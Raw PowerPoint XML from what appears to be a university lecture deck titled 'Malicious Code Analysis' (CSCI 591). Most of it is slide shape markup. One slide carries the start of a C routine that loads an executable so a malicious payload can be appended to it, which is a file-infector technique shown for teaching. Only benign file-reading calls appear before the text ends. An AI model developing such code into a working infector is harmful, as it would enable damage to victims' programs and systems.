                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1953" y="6025"/>
                    <a:pt x="1524" y="5585"/>
                    <a:pt x="1001" y="5585"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="D1202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4" name="Google Shape;121;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2632711" y="2657611"/>
              <a:ext cx="401750" cy="366422"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9871" h="9003" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7620" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6382" y="1"/>
                    <a:pt x="5394" y="1001"/>
                    <a:pt x="5394" y="2227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5394" y="2739"/>
                    <a:pt x="5572" y="3216"/>
                    <a:pt x="5846" y="3585"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2334" y="6621"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2084" y="6383"/>
                    <a:pt x="1762" y="6228"/>
                    <a:pt x="1381" y="6228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="631" y="6228"/>
                    <a:pt x="0" y="6859"/>
                    <a:pt x="0" y="7621"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="8371"/>
                    <a:pt x="631" y="9002"/>
                    <a:pt x="1381" y="9002"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2143" y="9002"/>
                    <a:pt x="2774" y="8371"/>
                    <a:pt x="2774" y="7621"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2774" y="7323"/>
                    <a:pt x="2667" y="7038"/>
                    <a:pt x="2513" y="6811"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6025" y="3775"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6430" y="4192"/>
                    <a:pt x="7001" y="4466"/>
                    <a:pt x="7632" y="4466"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8870" y="4466"/>
                    <a:pt x="9871" y="3466"/>
                    <a:pt x="9871" y="2227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9835" y="1001"/>
                    <a:pt x="8847" y="1"/>
                    <a:pt x="7620"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5" name="Google Shape;122;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2264418" y="4879399"/>
              <a:ext cx="914936" cy="109564"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="22480" h="2692" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="2692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480" y="2692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480" y="1"/>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6" name="Google Shape;123;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2434014" y="5036907"/>
              <a:ext cx="745828" cy="54294"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1334" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1"/>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7" name="Google Shape;124;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2434014" y="5126079"/>
              <a:ext cx="745828" cy="54294"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1334" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324"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8" name="Google Shape;125;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2689895" y="5214764"/>
              <a:ext cx="489947" cy="54782"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12038" h="1346" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12037" y="1345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12037"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9" name="Google Shape;126;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2894859" y="2508365"/>
              <a:ext cx="94546" cy="94546"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2323" h="2323" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1167" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="524" y="1"/>
                    <a:pt x="1" y="525"/>
                    <a:pt x="1" y="1168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1811"/>
                    <a:pt x="524" y="2323"/>
                    <a:pt x="1167" y="2323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1810" y="2323"/>
                    <a:pt x="2322" y="1811"/>
                    <a:pt x="2322" y="1168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2322" y="525"/>
                    <a:pt x="1810" y="1"/>
                    <a:pt x="1167"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0" name="Google Shape;127;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1006072" y="1271750"/>
              <a:ext cx="486039" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11942" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7370" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4572" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11942"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1" name="Google Shape;128;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-705666"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2" name="Google Shape;129;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-405219"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3" name="Google Shape;130;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-105261" y="1271750"/>
              <a:ext cx="486080" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11943" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7371" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4573" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11943"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4" name="Google Shape;131;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="195186" y="1271750"/>
              <a:ext cx="485103" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11919" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7359" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4573"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5" name="Google Shape;132;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="495633" y="1271750"/>
              <a:ext cx="485103" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11919" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7359" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4561"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6" name="Google Shape;133;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="792702" y="1271750"/>
              <a:ext cx="485103" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11919" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7346" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4560" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11918"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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="矩形 172"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9970770" y="109855"/>
            <a:ext cx="1960245" cy="55308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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2023.09.21</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11677571" y="6016506"/>
            <a:ext cx="247650" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;54;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2731135" y="1773555"/>
            <a:ext cx="6729730" cy="209804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panose="020B0604020202020204"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" sz="6000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Malicious Code Analysis</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="6000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="299085" y="109855"/>
            <a:ext cx="1848142" cy="1296000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;55;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4536123" y="4035425"/>
            <a:ext cx="3119755" cy="749935"/>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Fangtian Zhong</a:t>
            </a:r>
            <a:endPar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CSCI 591</a:t>
            </a:r>
            <a:endPar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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886710" y="5492115"/>
            <a:ext cx="6418580" cy="1139825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150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Gianforte School of Computing </a:t>
            </a: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en-GB" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Norm Asbjornson College of Engineering</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:sym typeface="+mn-ea"/>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E-mail: fangtian.zhong@montana.edu</a:t>
            </a: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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975360" y="318770"/>
            <a:ext cx="977646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PE</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1"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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3170555" y="-106680"/>
            <a:ext cx="473075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custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="995998" y="1095375"/>
            <a:ext cx="10200005" cy="5269230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>VOID LoadExeFile(LPCSTR FileName)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	// If exist，then open the file. Here we want to read the infected program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	HANDLE FileHandle = CreateFileA(FileName, GENERIC_READ, NULL,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>		NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	// Get the size of the file because we want to add the malicious payload to its end.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	FileSize = GetFileSize(FileHandle, NULL);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	FileBase = (DWORD)calloc(FileSize, sizeof(BYTE));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	// load the infected program to a buffer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	DWORD Read = 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	ReadFile(FileHandle, (LPVOID)FileBase, FileSize, &amp;Read, NULL);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	// close the file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	CloseHandle(FileHandle);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
